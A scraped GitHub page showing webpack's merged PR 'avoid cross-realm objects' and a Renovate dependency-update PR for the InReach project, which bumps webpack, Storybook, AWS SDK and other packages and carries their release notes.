Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

security: avoid cross-realm objects #16500

Merged
merged 6 commits into from Dec 5, 2022

Conversation

Jack-Works
Copy link
Contributor

@Jack-Works Jack-Works commented Nov 22, 2022

What kind of change does this PR introduce?

refactoring: avoid cross-realm object access.

Did you add tests for your changes?

not yet

Does this PR introduce a breaking change?

no

What needs to be documented once your changes are merged?

nothing

@webpack-bot
Copy link
Contributor

For maintainers only:

  • This needs to be documented (issue in webpack/webpack.js.org will be filed when merged)
  • This needs to be backported to webpack 4 (issue will be created when merged)

@Jack-Works Jack-Works changed the title fix: avoid cross-realm objects refactorr: avoid cross-realm objects Nov 22, 2022
@Jack-Works Jack-Works marked this pull request as ready for review November 22, 2022 03:43
@Jack-Works Jack-Works changed the title refactorr: avoid cross-realm objects refactor: avoid cross-realm objects Nov 22, 2022
@sokra sokra merged commit 4b4ca3b into webpack:main Dec 5, 2022
@sokra
Copy link
Member

sokra commented Dec 5, 2022

Thanks

@Jack-Works Jack-Works deleted the avoid-cross-realm-object branch December 5, 2022 13:00
kodiakhq bot added a commit to weareinreach/InReach that referenced this pull request Mar 8, 2023
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [@aws-sdk/client-cognito-identity-provider](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-cognito-identity-provider) ([source](https://togithub.com/aws/aws-sdk-js-v3)) | [`3.282.0` -> `3.287.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-cognito-identity-provider/3.282.0/3.287.0) | [![age](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/compatibility-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-cognito-identity-provider/3.287.0/confidence-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) |
| [@aws-sdk/client-s3](https://togithub.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3) ([source](https://togithub.com/aws/aws-sdk-js-v3)) | [`3.282.0` -> `3.287.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.282.0/3.287.0) | [![age](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/compatibility-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@aws-sdk%2fclient-s3/3.287.0/confidence-slim/3.282.0)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-a11y](https://togithub.com/storybookjs/storybook/tree/main/addons/a11y) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-a11y/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-a11y/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-actions](https://togithub.com/storybookjs/storybook/tree/main/addons/actions) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-actions/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-actions/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-docs](https://togithub.com/storybookjs/storybook/tree/main/addons/docs) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-docs/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-docs/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-essentials](https://togithub.com/storybookjs/storybook/tree/main/addons/essentials) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-essentials/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-interactions](https://togithub.com/storybookjs/storybook/tree/main/addons/interactions) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-interactions/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-links](https://togithub.com/storybookjs/storybook/tree/main/addons/links) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-links/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/addon-viewport](https://togithub.com/storybookjs/storybook/tree/main/addons/viewport) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2faddon-viewport/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2faddon-viewport/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/nextjs](https://togithub.com/storybookjs/storybook/tree/next/code/frameworks/nextjs) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2fnextjs/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2fnextjs/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/react](https://togithub.com/storybookjs/storybook/tree/main/app/react) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2freact/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2freact/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/theming](https://togithub.com/storybookjs/storybook/tree/main/lib/theming) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2ftheming/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2ftheming/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@storybook/types](https://togithub.com/storybookjs/storybook/tree/main/code/lib/types) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/@storybook%2ftypes/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@storybook%2ftypes/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [@total-typescript/ts-reset](https://togithub.com/total-typescript/ts-reset) | [`0.3.7` -> `0.4.2`](https://renovatebot.com/diffs/npm/@total-typescript%2fts-reset/0.3.7/0.4.2) | [![age](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/compatibility-slim/0.3.7)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/@total-typescript%2fts-reset/0.4.2/confidence-slim/0.3.7)](https://docs.renovatebot.com/merge-confidence/) |
| [embla-carousel-react](https://www.embla-carousel.com) ([source](https://togithub.com/davidjerleke/embla-carousel)) | [`7.0.9` -> `7.1.0`](https://renovatebot.com/diffs/npm/embla-carousel-react/7.0.9/7.1.0) | [![age](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/compatibility-slim/7.0.9)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/embla-carousel-react/7.1.0/confidence-slim/7.0.9)](https://docs.renovatebot.com/merge-confidence/) |
| [msw-storybook-addon](https://msw-sb.vercel.app/) ([source](https://togithub.com/mswjs/msw-storybook-addon)) | [`1.7.0` -> `1.8.0`](https://renovatebot.com/diffs/npm/msw-storybook-addon/1.7.0/1.8.0) | [![age](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/compatibility-slim/1.7.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/msw-storybook-addon/1.8.0/confidence-slim/1.7.0)](https://docs.renovatebot.com/merge-confidence/) |
| [next-i18next](https://togithub.com/i18next/next-i18next) | [`13.2.1` -> `13.2.2`](https://renovatebot.com/diffs/npm/next-i18next/13.2.1/13.2.2) | [![age](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/compatibility-slim/13.2.1)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/next-i18next/13.2.2/confidence-slim/13.2.1)](https://docs.renovatebot.com/merge-confidence/) |
| [storybook](https://togithub.com/storybookjs/storybook/tree/main/lib/cli) ([source](https://togithub.com/storybookjs/storybook)) | [`7.0.0-beta.62` -> `7.0.0-beta.63`](https://renovatebot.com/diffs/npm/storybook/7.0.0-beta.62/7.0.0-beta.63) | [![age](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/compatibility-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/storybook/7.0.0-beta.63/confidence-slim/7.0.0-beta.62)](https://docs.renovatebot.com/merge-confidence/) |
| [webpack](https://togithub.com/webpack/webpack) | [`5.75.0` -> `5.76.0`](https://renovatebot.com/diffs/npm/webpack/5.75.0/5.76.0) | [![age](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/age-slim)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/adoption-slim)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/compatibility-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://badges.renovateapi.com/packages/npm/webpack/5.76.0/confidence-slim/5.75.0)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>aws/aws-sdk-js-v3 (@&#8203;aws-sdk/client-cognito-identity-provider)</summary>

### [`v3.287.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-cognito-identity-provider/CHANGELOG.md#&#8203;32870-httpsgithubcomawsaws-sdk-js-v3comparev32860v32870-2023-03-08)

[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.282.0...v3.287.0)

##### Bug Fixes

-   **clients:** remove aggregated client from paginators ([#&#8203;4496](https://togithub.com/aws/aws-sdk-js-v3/issues/4496)) ([aea457a](https://togithub.com/aws/aws-sdk-js-v3/commit/aea457ab5d4e72939f2f608140d82b60526eb716))

</details>

<details>
<summary>aws/aws-sdk-js-v3 (@&#8203;aws-sdk/client-s3)</summary>

### [`v3.287.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#&#8203;32870-httpsgithubcomawsaws-sdk-js-v3comparev32860v32870-2023-03-08)

[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.282.0...v3.287.0)

##### Bug Fixes

-   **clients:** remove aggregated client from paginators ([#&#8203;4496](https://togithub.com/aws/aws-sdk-js-v3/issues/4496)) ([aea457a](https://togithub.com/aws/aws-sdk-js-v3/commit/aea457ab5d4e72939f2f608140d82b60526eb716))

</details>

<details>
<summary>storybookjs/storybook</summary>

### [`v7.0.0-beta.63`](https://togithub.com/storybookjs/storybook/blob/HEAD/CHANGELOG.md#&#8203;700-beta63-March-9-2023)

[Compare Source](https://togithub.com/storybookjs/storybook/compare/v7.0.0-beta.62...v7.0.0-beta.63)

##### Bug Fixes

-   Story Index: Fix storySort parsing for parameters variable [#&#8203;21481](https://togithub.com/storybooks/storybook/pull/21481)
-   React/Vite: Add some missing types [#&#8203;21449](https://togithub.com/storybooks/storybook/pull/21449)
-   Docs: Cleanup with Promise instead of setTimeout [#&#8203;21476](https://togithub.com/storybooks/storybook/pull/21476)
-   Docs: Re-render MDX files when you fix a thrown error [#&#8203;21454](https://togithub.com/storybooks/storybook/pull/21454)
-   CLI: Fix mdx-to-csf codemod blocks imports [#&#8203;21448](https://togithub.com/storybooks/storybook/pull/21448)

##### Maintenance

-   CLI: Copy tweaks for automigrations [#&#8203;21475](https://togithub.com/storybooks/storybook/pull/21475)
-   CLI: Warn the user when stories glob does not match any file [#&#8203;21392](https://togithub.com/storybooks/storybook/pull/21392)
-   Docs: Use `Of` type in `useOf` argument [#&#8203;21442](https://togithub.com/storybooks/storybook/pull/21442)
-   Telemetry: Is interactive shell [#&#8203;21436](https://togithub.com/storybooks/storybook/pull/21436)

</details>

<details>
<summary>total-typescript/ts-reset</summary>

### [`v0.4.2`](https://togithub.com/total-typescript/ts-reset/releases/tag/v0.4.2)

#### 0.4.2

##### Minor Changes

-   [`ce9db42`](https://togithub.com/total-typescript/ts-reset/commit/ce9db42): Added support for widening in `Array.lastIndexOf`, `Array.indexOf`, `ReadonlyArray.lastIndexOf` and `ReadonlyArray.indexOf`.

-   [`107dfc2`](https://togithub.com/total-typescript/ts-reset/commit/107dfc2): Changed the array.includes on readonly arrays to NOT be a type predicate. Before this change, this perfectly valid code would not behave correctly.

    ```ts
    type Code = 0 | 1 | 2;
    type SpecificCode = 0 | 1;

    const currentCode: Code = 0;

    // Create an empty list of subset type
    const specificCodeList: ReadonlyArray<SpecificCode> = [];

    // This will be false, since 0 is not in []
    if (specificCodeList.includes(currentCode)) {
      currentCode; // -> SpecificCode
    } else {
      // This branch will be entered, and ts will think z is 2, when it is actually 0
      currentCode; // -> 2
    }
    ```

    Removing the type predicate brings ts-reset closer towards correctness.

-   [`4765413`](https://togithub.com/total-typescript/ts-reset/commit/4765413): author: [@&#8203;mefechoel](https://togithub.com/mefechoel)

    Added the `Map.has` rule.

    Similar to `.includes` or `Set.has()`, `Map.has()` doesn't let you pass members that don't exist in the map's keys:

    ```ts
    // BEFORE
    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // Argument of type '"bryan"' is not assignable to
    // parameter of type '"matt" | "sofia" | "waqas"'.
    userMap.has("bryan");
    ```

    With the rule enabled, `Map` follows the same semantics as `Set`.

    ```ts
    // AFTER
    import "@&#8203;total-typescript/ts-reset/map-has";

    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // .has now takes a string as the argument!
    userMap.has("bryan");
    ```

##### Patch Changes

-   [`b15aaa4`](https://togithub.com/total-typescript/ts-reset/commit/b15aaa4): Fixed an oversight with the initial `set-has` implementation by adding support to `ReadonlySet`.

### [`v0.4.1`](https://togithub.com/total-typescript/ts-reset/blob/HEAD/CHANGELOG.md#&#8203;041)

##### Patch Changes

-   No changes, just pushing to fix the previous slightly borked release.

### [`v0.4.0`](https://togithub.com/total-typescript/ts-reset/blob/HEAD/CHANGELOG.md#&#8203;040)

##### Minor Changes

-   [`ce9db42`](https://togithub.com/total-typescript/ts-reset/commit/ce9db42): Added support for widening in `Array.lastIndexOf`, `Array.indexOf`, `ReadonlyArray.lastIndexOf` and `ReadonlyArray.indexOf`.

-   [`107dfc2`](https://togithub.com/total-typescript/ts-reset/commit/107dfc2): Changed the array.includes on readonly arrays to NOT be a type predicate. Before this change, this perfectly valid code would not behave correctly.

    ```ts
    type Code = 0 | 1 | 2;
    type SpecificCode = 0 | 1;

    const currentCode: Code = 0;

    // Create an empty list of subset type
    const specificCodeList: ReadonlyArray<SpecificCode> = [];

    // This will be false, since 0 is not in []
    if (specificCodeList.includes(currentCode)) {
      currentCode; // -> SpecificCode
    } else {
      // This branch will be entered, and ts will think z is 2, when it is actually 0
      currentCode; // -> 2
    }
    ```

    Removing the type predicate brings ts-reset closer towards correctness.

-   [`4765413`](https://togithub.com/total-typescript/ts-reset/commit/4765413): author: [@&#8203;mefechoel](https://togithub.com/mefechoel)

    Added the `Map.has` rule.

    Similar to `.includes` or `Set.has()`, `Map.has()` doesn't let you pass members that don't exist in the map's keys:

    ```ts
    // BEFORE
    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // Argument of type '"bryan"' is not assignable to
    // parameter of type '"matt" | "sofia" | "waqas"'.
    userMap.has("bryan");
    ```

    With the rule enabled, `Map` follows the same semantics as `Set`.

    ```ts
    // AFTER
    import "@&#8203;total-typescript/ts-reset/map-has";

    const userMap = new Map([
      ["matt", 0],
      ["sofia", 1],
      [2, "waqas"],
    ] as const);

    // .has now takes a string as the argument!
    userMap.has("bryan");
    ```

##### Patch Changes

-   [`b15aaa4`](https://togithub.com/total-typescript/ts-reset/commit/b15aaa4): Fixed an oversight with the initial `set-has` implementation by adding support to `ReadonlySet`.

</details>

<details>
<summary>davidjerleke/embla-carousel</summary>

### [`v7.1.0`](https://togithub.com/davidjerleke/embla-carousel/releases/tag/v7.1.0)

[Compare Source](https://togithub.com/davidjerleke/embla-carousel/compare/v7.0.9...v7.1.0)

### 🌟 New features:

-   \[x] [#&#8203;440](https://togithub.com/davidjerleke/embla-carousel/issues/440) - Add [`slides`](https://www.embla-carousel.com/api/options/#slides) & [`container`](https://www.embla-carousel.com/api/options/#container) options.

##### Donations

Embla Carousel is an open source MIT licensed project. If you are interested in supporting this project, please consider:

-   [One-off donation via PayPal](https://www.paypal.com/paypalme/davidjerleke)
-   [One-off/monthly donations via Ko-fi](https://ko-fi.com/davidjerleke)

***

#### What's Changed

-   Migrate to the latest Gatsby version by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [davidjerleke/embla-carousel#428
-   Docs improvements by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [davidjerleke/embla-carousel#439
-   Add `slides` & `container` options by [@&#8203;davidjerleke](https://togithub.com/davidjerleke) in [davidjerleke/embla-carousel#441

**Full Changelog**: davidjerleke/embla-carousel@v7.0.9...v7.1.0

</details>

<details>
<summary>mswjs/msw-storybook-addon</summary>

### [`v1.8.0`](https://togithub.com/mswjs/msw-storybook-addon/blob/HEAD/packages/msw-addon/CHANGELOG.md#v180-Wed-Mar-08-2023)

[Compare Source](https://togithub.com/mswjs/msw-storybook-addon/compare/v1.7.0...v1.8.0)

##### 🚀 Enhancement

-   support Storybook 7 [#&#8203;102](https://togithub.com/mswjs/msw-storybook-addon/pull/102) ([@&#8203;yannbf](https://togithub.com/yannbf))

##### 🐛 Bug Fix

-   Fetch git tags on release workflow [#&#8203;103](https://togithub.com/mswjs/msw-storybook-addon/pull/103) ([@&#8203;yannbf](https://togithub.com/yannbf))
-   Use auto for release management [#&#8203;100](https://togithub.com/mswjs/msw-storybook-addon/pull/100) ([@&#8203;yannbf](https://togithub.com/yannbf))
-   fix: update peer dependency range [#&#8203;94](https://togithub.com/mswjs/msw-storybook-addon/pull/94) ([@&#8203;rajtslegr](https://togithub.com/rajtslegr))

##### Authors: 2

-   Petr Rajtslegr ([@&#8203;rajtslegr](https://togithub.com/rajtslegr))
-   Yann Braga ([@&#8203;yannbf](https://togithub.com/yannbf))

</details>

<details>
<summary>i18next/next-i18next</summary>

### [`v13.2.2`](https://togithub.com/i18next/next-i18next/blob/HEAD/CHANGELOG.md#&#8203;1322)

[Compare Source](https://togithub.com/i18next/next-i18next/compare/v13.2.1...v13.2.2)

-   pageProps may be undefined on strange setups [#&#8203;2109](https://togithub.com/i18next/next-i18next/issues/2109)"

</details>

<details>
<summary>webpack/webpack</summary>

### [`v5.76.0`](https://togithub.com/webpack/webpack/releases/tag/v5.76.0)

[Compare Source](https://togithub.com/webpack/webpack/compare/v5.75.0...v5.76.0)

#### Bugfixes

-   Avoid cross-realm object access by [@&#8203;Jack-Works](https://togithub.com/Jack-Works) in [webpack/webpack#16500
-   Improve hash performance via conditional initialization by [@&#8203;lvivski](https://togithub.com/lvivski) in [webpack/webpack#16491
-   Serialize `generatedCode` info to fix bug in asset module cache restoration by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [webpack/webpack#16703
-   Improve performance of `hashRegExp` lookup by [@&#8203;ryanwilsonperkin](https://togithub.com/ryanwilsonperkin) in [webpack/webpack#16759

#### Features

-   add `target` to `LoaderContext` type by [@&#8203;askoufis](https://togithub.com/askoufis) in [webpack/webpack#16781

#### Security

-   [CVE-2022-37603](https://togithub.com/advisories/GHSA-3rfm-jhwj-7488) fixed by [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) in [webpack/webpack#16446

#### Repo Changes

-   Fix HTML5 logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [webpack/webpack#16614
-   Replace TypeScript logo in README by [@&#8203;jakebailey](https://togithub.com/jakebailey) in [webpack/webpack#16613
-   Update actions/cache dependencies by [@&#8203;piwysocki](https://togithub.com/piwysocki) in [webpack/webpack#16493

#### New Contributors

-   [@&#8203;Jack-Works](https://togithub.com/Jack-Works) made their first contribution in [webpack/webpack#16500
-   [@&#8203;lvivski](https://togithub.com/lvivski) made their first contribution in [webpack/webpack#16491
-   [@&#8203;jakebailey](https://togithub.com/jakebailey) made their first contribution in [webpack/webpack#16614
-   [@&#8203;akhilgkrishnan](https://togithub.com/akhilgkrishnan) made their first contribution in [webpack/webpack#16446
